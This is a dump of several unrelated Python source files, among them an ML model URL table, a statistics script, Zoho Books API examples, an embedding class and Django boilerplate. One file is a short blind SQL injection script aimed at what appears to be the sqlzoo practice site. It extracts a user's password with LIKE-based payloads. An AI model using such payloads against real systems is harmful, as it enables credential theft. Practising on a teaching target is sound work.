'https://storage.googleapis.com/chineseglue/pretrain_models/roeberta_zh_L-24_H-1024_A-16.zip',
'roberta_wwm_ext_zh_brightmart':
'https://storage.googleapis.com/chineseglue/pretrain_models/chinese_roberta_wwm_ext_L-12_H-768_A-12.zip',
'roberta_wwm_ext_large_zh_brightmart':
'https://storage.googleapis.com/chineseglue/pretrain_models/chinese_roberta_wwm_large_ext_L-24_H-1024_A-16.zip'
}
pretrained_names = list(pretrained_urls.keys())
pretrained_types = {}
for model_name in pretrained_names:
if model_name.startswith('bert'):
pretrained_types[model_name] = 'bert'
else:
pretrained_types[model_name] = '_'.join(
[model_name.split('_')[0], model_name.split('_')[-1]])
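# --- Worked example (illustrative addition) ---
# The loop above derives a coarse model type from each pretrained name, e.g.:
#   pretrained_types['bert_wwm_ext_zh']               -> 'bert'
#   pretrained_types['albert_tiny_zh_brightmart']     -> 'albert_brightmart'
#   pretrained_types['roberta_wwm_ext_zh_brightmart'] -> 'roberta_brightmart'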
|
py | b414f06e82b44a455621d71d90952be80633fd04 | #!/usr/bin/env python3
# vim: set ai et ts=4 sw=4:
import requests
import sys
import os
import re
cputube_url = 'http://commitfest.cputube.org/'
commitfest_url = 'https://commitfest.postgresql.org/'
headers = {}
headers['user-agent'] = u'Mozilla/5.0 (compatible; MSIE 9.0; ' + \
u'Windows NT 6.0; Trident/5.0; Trident/5.0)'
body = requests.get(cputube_url, headers = headers).text
print("""
DROP TABLE IF EXISTS cputube;
CREATE TABLE cputube (url text, apply_passing bool, build_passing bool);
""");
sys.stdout.flush()
re_str = "(?is)<tr>\s*(<td>(\d+/\d+)</td>)\s*" + ("(<td[^>]*>(.*?)</td>\s*?)"*5) + "(<td>[^>]+</td>)?\s*</tr>"
for fi in re.finditer(re_str, body):
[pid, apply_passing, build_passing] = [fi.group(i) for i in [2, 10, 12]]
    url = commitfest_url + pid + "/"
apply_passing = (apply_passing.find("apply-passing.svg") > 0)
if not apply_passing:
build_passing = False
else:
m = re.search('(?i)<img src="(https?://travis-ci.org/[^"]+.svg[^"]+)"', build_passing)
img_url = m.group(1)
# print("-- Fetching {}...".format(img_url))
img_content = requests.get(img_url, headers = headers).text
build_passing = (img_content.find(">passing</text>") > 0)
print("""
INSERT INTO cputube (url, apply_passing, build_passing) VALUES('{}', '{}', '{}');
""".format(url, 't' if apply_passing else 'f', 't' if build_passing else 'f'))
sys.stdout.flush()
|
py | b414f0e76da5086c02b5a733693156e8e3179392 | ################################### LICENSE ####################################
# Copyright 2016 Morphux #
# #
# Licensed under the Apache License, Version 2.0 (the "License"); #
# you may not use this file except in compliance with the License. #
# You may obtain a copy of the License at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
################################################################################
##
# sed_p2.py
# Created: 21/12/2016
# By: Louis Solofrizzo <[email protected]>
##
import os
class Sed_P2:
conf_lst = {}
e = False
root_dir = ""
def init(self, c_lst, ex, root_dir):
self.conf_lst = c_lst
self.e = ex
self.root_dir = root_dir
self.config = {
"name": "sed", # Name of the package
"version": "4.2.2", # Version of the package
"size": 10, # Size of the installed package (MB)
"archive": "sed-4.2.2.tar.bz2", # Archive name
"SBU": 0.2, # SBU (Compilation time)
"tmp_install": False, # Is this package part of the temporary install
"next": "shadow", # Next package to install
"before": False,
"after": False,
"urls": [ # Url to download the package. The first one must be morphux servers
"https://install.morphux.org/packages/sed-4.2.2.tar.bz2"
]
}
return self.config
def configure(self):
return self.e(["./configure",
"--prefix=/usr",
"--bindir=/bin",
"--htmldir=/usr/share/doc/sed-4.2.2"
])
def make(self):
return self.e(["make", "-j", self.conf_lst["cpus"]])
def install(self):
return self.e(["make", "install"])
|
py | b414f1da1cfa7f7b882a51b81886db09984ab95b | from os import listdir
from os.path import isfile, join
import pandas as pd
import sys
import numpy
from scipy import stats
import os
#MODES = ["default", "syntactic", "semantic", "graph"]
DATASETS = ["MR", "Ohsumed", "R8", "R52"]
MODES = ["default", "graph", "syntactic"]
def clean_text(txt):
return txt.split(':')[1].replace(',', '')
def get_metrics(file_path, info, mode, dataset):
    epochs = 0  # default in case the log contains no "Epoch:" line
with open(file_path) as f:
text = f.readlines()
for line in text:
if line[0:6] == "Epoch:":
#line = line.replace('\n', '').replace(', ', ' ').replace(':', ' ').replace('=', ' ')
epochs = line.split(" ")[1]
if line[0:17] == "Test set results:":
#line = line.replace('\n', '').replace(', ', ' ').replace(':', ' ').replace('=', ' ')
tokens = line.split(" ")
return {
"cost": tokens[4].replace(',', ''),
"accuracy": tokens[6].replace(',', ''),
"epochs": int(epochs),
"mode": mode,
"dataset": dataset,
"experiment": info[1],
"name": info[4],
"run": info[6].split(".")[0]
}
def calculate_basic_statistics(df, mode, dataset):
# Implment Basic statistics and save as csv
all_results = []
exp = []
for i in range(19): # This for controls the experiments. Use 25 to get all CUSTOM
experiment = df.loc[df['experiment'] == i]
experiment_name = df.loc[df['experiment'] == i]["name"].values[0]
exp.append(experiment["accuracy"])
results = {
'experiment': i,
'name': experiment_name,
'min': numpy.min(experiment["accuracy"]),
}
results["max"] = numpy.max(experiment["accuracy"])
results["mean"] = numpy.mean(experiment["accuracy"])
results["median"] = numpy.median(experiment["accuracy"])
results["variance"] = numpy.var(experiment["accuracy"])
results["standard_deviation"] = numpy.std(experiment["accuracy"])
results["min_epochs"] = numpy.min(experiment["epochs"])
results["max_epochs"] = numpy.max(experiment["epochs"])
results["mean_epochs"] = numpy.mean(experiment["epochs"])
results["median_epochs"] = numpy.median(experiment["epochs"])
results["var_epochs"] = numpy.var(experiment["epochs"])
results["std_epochs"] = numpy.std(experiment["epochs"])
all_results.append(results)
results = pd.DataFrame(all_results)
if not os.path.exists(f'./statistics/{mode}/'):
os.makedirs(f'./statistics/{mode}/')
results.to_csv(
# "./Basic_Statistics/"+dataset+".csv",
f'./statistics/{mode}/{dataset}.csv',
sep=';',
index=False
)
return results
def calculate_statistics(all_results, dataset):
print("------ Working with dataset", dataset, "------\n")
ORIGINAL_PAPER = {
"MR": {"avg": 0.7674, "std": 0.0020},
"Ohsumed": {"avg": 0.6836, "std": 0.0056},
"R8": {"avg": 0.9707, "std": 0.0010},
"R52": {"avg": 0.9356, "std": 0.0018}
}
results = pd.DataFrame(all_results)
max_result = results.loc[(results["mean"] == numpy.max(results["mean"]))]
print(results)
print(max_result)
ttest_ind_from_stats = stats.ttest_ind_from_stats(
mean2=max_result["mean"].values[0],
std2=max_result["standard_deviation"].values[0],
nobs2=10,
mean1=ORIGINAL_PAPER[dataset]["avg"],
std1=ORIGINAL_PAPER[dataset]["std"],
nobs1=10
)
print(ttest_ind_from_stats)
all_results = []
for mode in MODES:
for dataset in DATASETS:
for run in range(1):
#mypath = PATH+dataset+"/RUN_"+str(run)
# dataset+"/RUN_"+str(run)
mypath = f'experiments/{mode}/{dataset}/RUN_{run}'
onlyfiles = [f for f in listdir(mypath) if isfile(
join(mypath, f)) and f[-4:] == ".txt"]
# EXPERIMENT_11_model_mr_DO05_run_6.txt
for f in onlyfiles:
info = f.split("_")
# print(info)
all_results.append(get_metrics(
mypath+"/"+f, info, mode, dataset))
df = pd.DataFrame(data=all_results)
df["cost"] = pd.to_numeric(df["cost"])
df["accuracy"] = pd.to_numeric(df["accuracy"])
df["experiment"] = pd.to_numeric(df["experiment"])
df["run"] = pd.to_numeric(df["run"])
df = df.sort_values(by=['experiment', 'run', 'mode', 'dataset'])
df = df.reset_index(drop=True)
statistics_results = []
best_results = []
for mode in MODES:
for dataset in DATASETS:
#experiments = df.loc[df['dataset'] == dataset]
experiments = df.loc[(df['mode'] == mode) & (df['dataset'] == dataset)]
calculate_basic_statistics(experiments, mode, dataset)
for experiment in range(19):
experiment_results = df.loc[(df["experiment"] == experiment)]
statistics_results.append(calculate_statistics(experiment_results, dataset))
results = pd.DataFrame(statistics_results)
max_result = results.loc[(results["mean"] == numpy.max(results["mean"]))]
best_results.append(calculate_statistics(max_result, dataset))
statistics_results_df = pd.DataFrame(statistics_results)
best_results_df = pd.DataFrame(best_results)
statistics_results_df.to_csv(
"./statistics/all_results.csv",
sep=';',
index=False
)
best_results_df.to_csv(
"./statistics/best_results.csv",
sep=';',
index=False
)
#statistics_results = []
#best_results = []
# for dataset in DATASETS:
# all_results = basic_stats[dataset]
# for experiment in range(19):
# results = pd.DataFrame(all_results)
# experiment_results = results.loc[(results["experiment"] == experiment)]
# statistics_results.append(calculate_statistics(experiment_results, dataset))
# results = pd.DataFrame(all_results)
# max_result = results.loc[(results["mean"] == numpy.max(results["mean"]))]
# best_results.append(calculate_statistics(max_result, dataset))
# statistics_results_df = pd.DataFrame(statistics_results)
# best_results_df = pd.DataFrame(best_results)
# statistics_results_df.to_csv(
# "./statistics/all_results.csv",
# sep=';',
# index=False
# )
# best_results_df.to_csv(
# "./statistics/best_results.csv",
# sep=';',
# index=False
# ) |
py | b414f1fee63406a59bcaf4416986b5d35ab81275 | # -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Copyright (c) 2009- Spyder Project Contributors
#
# Distributed under the terms of the MIT License
# (see spyder/__init__.py for details)
# -----------------------------------------------------------------------------
from spyder.plugins.pylint.plugin import Pylint as PLUGIN_CLASS
|
py | b414f2e45d0de1c02c5f767d337619424b88a795 | """
ASGI config for news_feed project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'news_feed.settings')
application = get_asgi_application()
|
py | b414f372cdbff51685be03a18d99155874705437 | # https://www.blog.pythonlibrary.org/2012/06/08/python-101-how-to-submit-a-web-form/
# https://stackoverflow.com/questions/28932205/automatizing-web-browser-form-filling-in-python
# https://github.com/jmcarp/robobrowser
# https://mechanicalsoup.readthedocs.io/en/stable/tutorial.html
import mechanicalsoup as ms
import requests
url = "https://sqlzoo.net/hack/"
# br = mechanize.Browser()
br = ms.StatefulBrowser()
br.open(url)
""" html from 'passwd.pl'
<br><form>
Please enter your name and password<br>
<table><tbody><tr><td>name:</td><td> <input name="name"></td></tr>
<tr><td>password:</td><td> <input type="password" name="password"></td></tr>
</tbody></table>
<input type="submit">
</form>
"""
name = "String"
password = "String"
form = {"name" : name, "password" : password}
# https://3.python-requests.org/user/quickstart/#passing-parameters-in-urls
load = {"name" : "' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '%w%') AND ''='", "password" : "' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '%w%') AND ''='"}
r = requests.get("https://sqlzoo.net/hack/passwd.pl", params = load)
r.text
load2 = {"name" : "' OR EXISTS(SELECT * FROM users WHERE name LIKE '%j%' AND password LIKE '%') AND ''='", "password" : "' OR EXISTS(SELECT * FROM users WHERE name LIKE '%j%' AND password LIKE '%') AND ''='"}
r2 = requests.get("https://sqlzoo.net/hack/passwd.pl", params = load2)
print(r2.text)
# This works because the LIKE command uses % and _ as wildcards. The % wildcard matches any string, the _ wildcard matches a single character.
|
py | b414f3cb3e418cc0d4014b73a67e48de95c8f45b | #$Id$#
from books.model.Preference import Preference
from books.model.Organization import Organization
from books.model.Address import Address
from books.model.User import User
from books.model.Item import Item
from books.model.InvoiceSetting import InvoiceSetting
from books.model.NotesAndTerms import NotesAndTerms
from books.model.EstimateSetting import EstimateSetting
from books.model.CreditnoteSetting import CreditnoteSetting
from books.model.Currency import Currency
from books.model.ExchangeRate import ExchangeRate
from books.model.Tax import Tax
from books.model.OpeningBalance import OpeningBalance
from books.model.Account import Account
from books.model.Autoreminder import Autoreminder
from books.model.ManualReminder import ManualReminder
from books.model.TaxGroup import TaxGroup
from books.service.ZohoBooks import ZohoBooks
import os
access_token = os.environ.get('ACCESS_TOKEN')
organization_id = os.environ.get('ORGANIZATION_ID')
zoho_books = ZohoBooks(access_token, organization_id)
settings_api = zoho_books.get_settings_api()
organizations_api = zoho_books.get_organizations_api()
users_api = zoho_books.get_users_api()
items_api = zoho_books.get_items_api()
currency_id = settings_api.get_currencies().get_currencies()[0].get_currency_id()
#List preferences
print settings_api.list_preferences()
#Update preference
preference = Preference()
preference.set_convert_to_invoice(False)
preference.set_notify_me_on_online_payment(True)
preference.set_send_payment_receipt_acknowledgement("")
preference.set_auto_notify_recurring_invoice("")
preference.set_snail_mail_include_payment_stub("")
preference.set_is_show_powered_by(True)
preference.set_attach_expense_receipt_to_invoice("")
preference.set_allow_auto_categorize("")
print settings_api.update_preferences(preference)
# Create a unit
print settings_api.create_unit("m")
#Delete unit
unit_id = "71127000000179031"
print settings_api.delete_unit(unit_id)
#Organization
organization_id = organizations_api.get_organizations()[0].get_organization_id()
# List organizations.
print organizations_api.get_organizations()
#Get organization
print organizations_api.get(organization_id)
#Create organization
organization = Organization()
organization.set_name("Jony and co")
address = Address()
address.set_street_address1("2/65")
address.set_street_address2("vignesh plaza")
address.set_city("MDU")
address.set_state("TN")
address.set_country("India")
address.set_zip("322")
organization.set_address(address)
organization.set_industry_type("")
organization.set_industry_size("")
organization.set_fiscal_year_start_month("january")
organization.set_currency_code("USD")
organization.set_time_zone("Asia/Calcutta")
organization.set_date_format("dd MMM yyyy")
organization.set_field_separator("")
organization.set_language_code("en")
organization.set_tax_basis("accrual")
organization.set_tax_type("tax")
organization.set_org_address("")
organization.set_remit_to_address("")
print organizations_api.create(organization)
#Update organization
organization = Organization()
organization.set_name("Jony and co")
address = Address()
address.set_street_address1("2/65")
address.set_street_address2("vignesh plaza")
address.set_city("MDU")
address.set_state("TN")
address.set_country("India")
address.set_zip("322")
organization.set_address(address)
organization.set_industry_type("")
organization.set_industry_size("")
organization.set_fiscal_year_start_month("january")
organization.set_currency_code("INR")
organization.set_time_zone("Asia/Calcutta")
organization.set_date_format("dd MMM yyyy")
organization.set_field_separator("")
organization.set_language_code("en")
organization.set_tax_basis("accrual")
organization.set_tax_type("tax")
organization.set_org_address("")
organization.set_remit_to_address("")
print organizations_api.update(organization_id, organization)
# User
user_id = users_api.get_users().get_users()[0].get_user_id()
#List user
print users_api.get_users()
param = {'filter_by': 'Status.All'}
print users_api.get_users(param)
# Get user
print users_api.get(user_id)
# current user
print users_api.current_user()
#Create user
user = User()
user.set_name("karanya")
user.set_email("[email protected]")
user.set_user_role("staff")
print users_api.create(user)
#update user
user = User()
user.set_name("vakaa")
user.set_email("[email protected]")
user.set_user_role("staff")
print users_api.update(user_id, user)
#delete user
print users_api.delete(user_id)
#Invite user
print users_api.invite_user(user_id)
#Mark user as active
print users_api.mark_user_as_active(user_id)
#Mark user as inactive
print users_api.mark_user_as_inactive(user_id)
# Item
item_id = items_api.list_items().get_items()[0].get_item_id()
# List items.
print items_api.list_items()
# Get an item
print items_api.get(item_id)
# Create item
item = Item()
item.set_name("Item 2")
item.set_description("Item")
item.set_rate(10.0)
item.set_account_id("")
item.set_tax_id("")
print items_api.create(item)
#Update item
item = Item()
item.set_name("item 1")
item.set_description("Item")
item.set_rate(100.0)
item.set_account_id("")
item.set_tax_id("")
print items_api.update(item_id, item)
#Delete item
print items_api.delete_item(item_id)
#Mark item as active
print items_api.mark_item_as_active(item_id)
#Mark item as inactive
print items_api.mark_item_as_inactive(item_id)
#Invoice Settings
#Get invoice settings
print settings_api.get_invoice_settings()
#update invoice settings
invoice_settings = InvoiceSetting()
invoice_settings.set_auto_generate(True)
invoice_settings.set_prefix_string("INV")
invoice_settings.set_start_at(1)
invoice_settings.set_next_number("43")
invoice_settings.set_quantity_precision(2)
#invoice_settings.set_discount_enabled(False)
invoice_settings.set_reference_text("")
#invoice_settings.set_default_template_id("")
invoice_settings.set_notes("Hai")
invoice_settings.set_terms("")
invoice_settings.set_is_shipping_charge_required(True)
invoice_settings.set_is_adjustment_required(True)
invoice_settings.set_invoice_item_type("")
invoice_settings.set_discount_type("item_level")
invoice_settings.set_warn_convert_to_open(True)
invoice_settings.set_warn_create_creditnotes(True)
invoice_settings.set_is_open_invoice_editable(True)
invoice_settings.set_is_sales_person_required(True)
print settings_api.update_invoice_settings(invoice_settings)
#Get invoice notes and terms
print settings_api.get_invoice_notes_and_terms()
#Update invoice notes and terms
notes_and_terms = NotesAndTerms()
notes_and_terms.set_notes("Thanks")
notes_and_terms.set_terms("")
print settings_api.update_invoice_notes_and_terms(notes_and_terms)
"""
#Estimates
#Get estimates settings.
"""
print settings_api.get_estimate_settings()
#update estimate settings
estimate_settings = EstimateSetting()
estimate_settings.set_auto_generate(True)
estimate_settings.set_prefix_string("EST-")
estimate_settings.set_start_at(2)
estimate_settings.set_next_number("041")
estimate_settings.set_quantity_precision(2)
estimate_settings.set_discount_type("item_level")
estimate_settings.set_reference_text("")
estimate_settings.set_notes("Hai")
estimate_settings.set_terms("")
estimate_settings.set_terms_to_invoice(True)
estimate_settings.set_notes_to_invoice(True)
estimate_settings.set_warn_estimate_to_invoice(True)
estimate_settings.set_is_sales_person_required(True)
print settings_api.update_estimate_settings(estimate_settings)
#Get estimates notes and terms.
print settings_api.get_estimates_notes_and_terms()
#update estimate notes and terms
notes_and_terms = NotesAndTerms()
notes_and_terms.set_notes("Thanks")
notes_and_terms.set_terms("")
print settings_api.update_estimates_notes_and_terms(notes_and_terms)
"""
#Creditnotes
#List credit note
"""
print settings_api.list_creditnote_settings()
#Update creditnotes settings
creditnote_settings = CreditnoteSetting()
creditnote_settings.set_auto_generate(True)
creditnote_settings.set_prefix_string("CN-")
creditnote_settings.set_reference_text("")
creditnote_settings.set_next_number("0027")
creditnote_settings.set_notes("Thank you")
creditnote_settings.set_terms("Conditions Apply")
print settings_api.update_creditnote_settings(creditnote_settings)
#Get creditnote notes and terms
print settings_api.get_creditnote_notes_and_terms()
#update creditnote notes and terms
notes_and_terms = NotesAndTerms()
notes_and_terms.set_notes("Thanks")
notes_and_terms.set_terms("")
print settings_api.update_creditnote_notes_and_terms(notes_and_terms)
"""
#Currency and exchange rate
#List currencies
"""
print settings_api.get_currencies()
#Get a currency
print settings_api.get_currency(currency_id)
#Create a currency
currency = Currency()
currency.set_currency_code("NPR")
currency.set_currency_symbol("")
currency.set_price_precision(1)
currency.set_currency_format("1,234,567.89")
print settings_api.create_currency(currency)
#Update currency
currency = Currency()
currency.set_currency_code("NPR")
currency.set_currency_symbol("")
currency.set_price_precision(1)
currency.set_currency_format("1,234,567.89")
print settings_api.update_currency(currency_id , currency)
#Delete currency
print settings_api.delete_currency(currency_id)
"""
#List exchange rates
exchange_rate_id = settings_api.list_exchange_rates(currency_id).get_exchange_rates()[0].get_exchange_rate_id()
"""
print settings_api.list_exchange_rates(currency_id)
#Get exchange rate
print settings_api.get_exchange_rate(currency_id, exchange_rate_id)
#Create an exchange rate
exchange_rate = ExchangeRate()
exchange_rate.set_currency_id(currency_id)
exchange_rate.set_currency_code("NPR")
exchange_rate.set_effective_date("2014-05-08")
exchange_rate.set_rate(25.0)
print settings_api.create_exchange_rate(exchange_rate)
#Update an exchange rate
exchange_rate = ExchangeRate()
exchange_rate.set_exchange_rate_id(exchange_rate_id)
exchange_rate.set_currency_id(currency_id)
exchange_rate.set_currency_code("EUR")
exchange_rate.set_effective_date("2014-05-08")
exchange_rate.set_rate(25.0)
print settings_api.update_exchange_rate(exchange_rate)
#Delete an exchange rate
print settings_api.delete_exchange_rate(currency_id, exchange_rate_id)
"""
#Tax and Tax group
tax_id = settings_api.get_taxes().get_taxes()[0].get_tax_id()
tax_group_id = "71127000000184003"
#List taxes
"""
print settings_api.get_taxes()
#Get a tax
print settings_api.get_tax(tax_id)
#Create tax
tax = Tax()
tax.set_tax_name("tax-1")
tax.set_tax_percentage(10.5)
tax.set_tax_type("tax")
print settings_api.create_tax(tax)
#update tax
tax = Tax()
tax.set_tax_name("Shipping_tax1")
tax.set_tax_percentage(10.5)
tax.set_tax_type("tax")
print settings_api.update_tax(tax_id, tax)
#Delete tax
print settings_api.delete_tax(tax_id)
#Get tax group
print settings_api.get_tax_group(tax_group_id)
#Create tax group
tax_group = TaxGroup()
tax_group.set_tax_group_name("group_taxes")
taxes = "71127000000183009,71127000000191007"
tax_group.set_taxes(taxes)
print settings_api.create_tax_group(tax_group)
#update tax group
tax_group = TaxGroup()
tax_group.set_tax_group_name("group_taxes")
taxes = "71127000000185001,71127000000183007"
tax_group.set_taxes(taxes)
tax_group.set_tax_group_id(tax_group_id)
print settings_api.update_tax_group(tax_group)
#Delete tax group
tax_group_id = "711270"
print settings_api.delete_tax_group(tax_group_id)
"""
#Opening balance
#Get opening balance
"""
print settings_api.get_opening_balance()
#Create opening balance
account_id="71127000000170302"
opening_balance = OpeningBalance()
opening_balance.set_date('2014-05-09')
accounts = Account()
accounts.set_account_id(account_id)
accounts.set_debit_or_credit("debit")
accounts.set_exchange_rate(1.0)
accounts.set_currency_id(currency_id)
accounts.set_amount(200.0)
opening_balance.set_accounts(accounts)
print settings_api.create_opening_balance(opening_balance)
#Update opening balance
account_id="71127000000170302"
opening_balance = OpeningBalance()
opening_balance.set_opening_balance_id("71127000000186001")
opening_balance.set_date('2014-05-09')
accounts = Account()
accounts.set_account_id(account_id)
accounts.set_debit_or_credit("debit")
accounts.set_exchange_rate(1.0)
accounts.set_currency_id("71127000000000099")
accounts.set_amount(2000.0)
opening_balance.set_accounts(accounts)
print settings_api.update_opening_balance(opening_balance)
#Delete opening balance
print settings_api.delete_opening_balance()
"""
#Auto payment reminder
auto_payment_reminder_id = settings_api.list_auto_payment_reminder().get_auto_reminders()[0].get_autoreminder_id()
#List auto payment reminder
"""
print settings_api.list_auto_payment_reminder()
"""
#Get an auto payment reminder
print settings_api.get_auto_payment_reminder(auto_payment_reminder_id)
"""
#Update an auto reminder
autoreminder = Autoreminder()
autoreminder.set_is_enabled(True)
autoreminder.set_notification_type('days_after_due_date')
autoreminder.set_address_type('remind_me')
autoreminder.set_number_of_days(3)
autoreminder.set_subject('hai')
autoreminder.set_body('Reminder')
print settings_api.update_auto_reminder(reminder_id, autoreminder)
"""
#List manual reminders
reminder_id = settings_api.list_manual_reminders().get_manual_reminders()[0].get_manualreminder_id()
"""
print settings_api.list_manual_reminders()
"""
#Get a manual reminder
print settings_api.get_manual_reminder(reminder_id)
"""
#Update a manual reminder
manual_reminder = ManualReminder()
manual_reminder.set_subject("Hello")
manual_reminder.set_body("Manual reminder")
manual_reminder.set_cc_me(False)
print settings_api.update_manual_reminder(reminder_id, manual_reminder)
"""
|
py | b414f5470f8f82aa8ec187ccddc4098799225fc0 | import heapq
from scipy.sparse import csr_matrix
from sklearn import preprocessing
import numpy as np
from socialsent.representations.matrix_serializer import load_vocabulary, load_matrix
class Explicit:
"""
Base class for explicit representations. Assumes that the serialized input is (P)PMI.
"""
def __init__(self, mat, word_vocab, context_vocab, normalize=True, restricted_context=None):
self.m = mat
self.iw = word_vocab
self.ic = context_vocab
self.wi = {w:i for i,w in enumerate(self.iw)}
self.ci = {c:i for i,c in enumerate(self.ic)}
self.normal = normalize
if restricted_context != None:
self.restrict_context(restricted_context)
if normalize:
self.normalize()
def __getitem__(self, key):
if self.oov(key):
raise KeyError
else:
return self.represent(key)
def __iter__(self):
return self.iw.__iter__()
def __contains__(self, key):
return not self.oov(key)
@classmethod
def load(cls, path, normalize=True, restricted_context=None, **kwargs):
mat = load_matrix(path)
word_vocab, context_vocab = load_vocabulary(mat, path)
return cls(mat, word_vocab, context_vocab, normalize=normalize, restricted_context=restricted_context)
def get_subembed(self, word_list, normalize=False, restrict_context=True):
"""
Gets subembedding.
"""
w_set = set(self.iw)
valid_w = [word for word in word_list if word in w_set]
new_w_indices = np.array([self.wi[word] for word in valid_w])
if restrict_context:
c_set = set(self.ic)
valid_c = [word for word in word_list if word in c_set]
new_c_indices = np.array([self.ci[word] for word in valid_c])
new_m = self.m[new_w_indices, :]
new_m = new_m[:, new_c_indices]
else:
valid_c = self.ic
new_m = self.m[new_w_indices, :]
return Explicit(new_m, valid_w, valid_c, normalize=normalize)
def restrict_context(self, rel_words):
"""
Restricts the context words (i.e, columns) to the provided words.
"""
rel_words = [word for word in rel_words if word in self.ci]
rel_indices = np.array([self.ci[rel_word] for rel_word in rel_words])
self.m = self.m[:, rel_indices]
self.ic = rel_words
self.ci = {c:i for i,c in enumerate(self.ic)}
def normalize(self):
preprocessing.normalize(self.m, copy=False)
def represent(self, w):
if w in self.wi:
return self.m[self.wi[w], :]
else:
return csr_matrix((1, len(self.ic)))
def similarity_first_order(self, w, c):
if self.oov(w) or self.oov(c):
return 0.0
return self.m[self.wi[w], self.ci[c]]
def oov(self, w):
return (not w in self.wi)
def similarity(self, w1, w2):
"""
Assumes the vectors have been normalized.
"""
if self.oov(w1) or self.oov(w2):
return float('nan')
return self.represent(w1).dot(self.represent(w2).T)[0, 0]
def closest_contexts(self, w, n=10):
"""
Assumes the vectors have been normalized.
"""
scores = self.represent(w)
return heapq.nlargest(n, zip(scores.data, [self.ic[i] for i in scores.indices]))
def closest(self, w, n=10):
"""
Assumes the vectors have been normalized.
"""
if self.oov(w):
return []
scores = self.m.dot(self.represent(w).T).T.tocsr()
return heapq.nlargest(n, zip(scores.data, [self.iw[i] for i in scores.indices]))
def closest_first_order(self, w, n=10):
if self.oov(w):
return []
scores = self.m[self.wi[w], :]
return heapq.nlargest(n, zip(scores.data, [self.iw[i] for i in scores.indices]))
class PositiveExplicit(Explicit):
"""
Positive PMI (PPMI) with negative sampling (neg).
Negative samples shift the PMI matrix before truncation.
"""
def __init__(self, mat, word_vocab, context_vocab, normalize=True, restricted_context=None, neg=1):
Explicit.__init__(self, mat, word_vocab, context_vocab, normalize=False, restricted_context=restricted_context)
self.m.data -= np.log(neg)
self.m.data[self.m.data < 0] = 0
self.m.eliminate_zeros()
if normalize:
self.normalize()
@classmethod
def load(cls, path, normalize=True, restricted_context=None, thresh=None, neg=1):
mat = load_matrix(path, thresh)
word_vocab, context_vocab = load_vocabulary(mat, path)
return cls(mat, word_vocab, context_vocab, normalize, restricted_context, neg=neg)
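# --- Usage sketch (illustrative addition, not part of the original module) ---
# Builds a PositiveExplicit embedding from a tiny in-memory PPMI-style matrix
# instead of a serialized file. The words and values are invented for the
# example; with neg=1 the matrix is only truncated at zero and row-normalized.
if __name__ == "__main__":
    words = ["good", "bad", "movie"]
    contexts = ["great", "awful", "film"]
    toy_ppmi = csr_matrix(np.array([
        [2.0, 0.0, 1.0],
        [0.0, 2.0, 1.0],
        [1.0, 1.0, 2.0],
    ]))
    embed = PositiveExplicit(toy_ppmi, words, contexts, normalize=True, neg=1)
    print(embed.similarity("good", "bad"))       # cosine similarity of the two normalized rows
    print(embed.closest_contexts("good", n=2))   # top-scoring context words for "good"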
|
py | b414f69d756964cdfde2ddf66d76e932d095ecab | # Generated by Django 2.0.5 on 2019-03-08 20:54
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('TCS', '0031_auto_20190228_1417'),
]
operations = [
migrations.AddField(
model_name='orderservice',
name='brandName',
field=models.CharField(blank=True, max_length=250),
),
migrations.AddField(
model_name='orderservice',
name='companyName',
field=models.CharField(blank=True, max_length=250),
),
migrations.AddField(
model_name='orderservice',
name='modeloName',
field=models.CharField(blank=True, max_length=250),
),
migrations.AddField(
model_name='orderservice',
name='storeName',
field=models.CharField(blank=True, max_length=250),
),
]
|
py | b414f6b7782643a693a0bbf9cf966c4cf8a51bed | class BaseDataStore(object):
""" Base absctract class for data store
Attributes:
walkers: list of Walkers, that would listener any message received from data store
"""
def __init__(self):
self.walkers = []
def on_message(self, message):
transformed_msg = self.transform(message)
for walker in self.walkers:
walker.recv(transformed_msg)
def register(self, walker):
self.walkers.append(walker)
def unregister(self, walker):
self.walkers.remove(walker)
def transform(self, msg):
return msg
def setup(self):
raise NotImplementedError
class StaticDataStore(BaseDataStore):
"""
    Used for static, unmodified data that is loaded once when the store is set up
Attributes:
messages: list of any type of message
"""
def __init__(self, messages):
super(StaticDataStore, self).__init__()
self.messages = messages
def setup(self):
for message in self.messages:
self.on_message(message)
class AsyncDataStore(BaseDataStore):
"""
Used for async data
Attributes:
        register_func: callable that accepts the on_message callback and registers it with the async source
"""
def __init__(self, register_func):
super(AsyncDataStore, self).__init__()
self.register_func = register_func
def setup(self):
self.register_func(self.on_message)
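# --- Usage sketch (illustrative addition, not part of the original module) ---
# The walker interface is not defined in this module; on_message() above only
# requires a recv() method. PrintWalker is a hypothetical stand-in used to show
# the register/setup flow of a StaticDataStore.
class PrintWalker(object):
    def recv(self, message):
        print("received: {}".format(message))
if __name__ == "__main__":
    store = StaticDataStore(["hello", "world"])
    store.register(PrintWalker())
    store.setup()  # replays every static message to each registered walker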
|
py | b414f791cb02a7c1fb5573907cccd7980e2160d4 | """
Run scheduled jobs.
Not meant for running job at precise time (+- 1h)
"""
import csv
import time
import arrow
import requests
from app import s3
from app.config import (
JOB_ONBOARDING_1,
JOB_ONBOARDING_2,
JOB_ONBOARDING_4,
JOB_BATCH_IMPORT,
)
from app.email_utils import (
send_email,
render,
get_email_domain_part,
)
from app.utils import sanitize_email
from app.extensions import db
from app.log import LOG
from app.models import (
User,
Job,
BatchImport,
Alias,
DeletedAlias,
DomainDeletedAlias,
CustomDomain,
)
from server import create_app
# fix the database connection leak issue
# use this method instead of create_app
def new_app():
app = create_app()
@app.teardown_appcontext
def shutdown_session(response_or_exc):
# same as shutdown_session() in flask-sqlalchemy but this is not enough
db.session.remove()
# dispose the engine too
db.engine.dispose()
return app
def onboarding_send_from_alias(user):
to_email, unsubscribe_link, via_email = user.get_communication_email()
if not to_email:
return
send_email(
to_email,
"SimpleLogin Tip: Send emails from your alias",
